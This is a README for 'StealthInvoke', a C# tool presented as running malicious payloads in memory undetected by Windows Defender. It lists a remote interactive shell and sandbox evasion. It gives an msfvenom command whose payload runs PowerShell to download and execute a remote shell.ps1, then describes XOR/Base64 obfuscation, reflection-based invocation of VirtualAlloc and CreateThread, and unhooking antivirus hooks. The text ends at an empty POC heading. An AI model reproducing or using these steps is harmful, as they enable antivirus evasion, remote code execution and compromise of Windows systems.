# StealthInvoke

Executes payloads undetected in memory.
StealthInvoke.exe is a C# application capable of bypassing Windows Defender. It dynamically invokes `VirtualAlloc` and `CreateThread` through `System.Reflection` and decrypts a malicious payload in memory, so the payload never touches disk and disk-based detection is bypassed.
## Features

- Remote interactive shell
- Dynamic invocation of functions such as `VirtualAlloc` and `CreateThread`
- Basic sandbox evasion
## How the script works

1. **Payload generation.** First, we generate a malicious payload using msfvenom. The command is as follows:

```
msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp
```
2. **Payload encryption.** Next, we encrypt the generated payload with XOR and Base64-encode the result. This step obfuscates the payload and makes it harder for antivirus programs such as Windows Defender to detect the malicious code. We apply the same XOR and Base64 treatment to the strings `VirtualAlloc` and `CreateThread`, so the function names do not appear in plaintext in the binary.

3. **Dynamic invocation and decryption.** Finally, using `System.Reflection`, we resolve and invoke these functions dynamically. The encrypted payload is then decrypted directly in memory.
**Note:** Advanced antivirus programs may have hooked functions such as `VirtualAlloc` and `CreateThread`. To execute our malicious payload, we first need to unhook them and then load the payload into memory.
## POC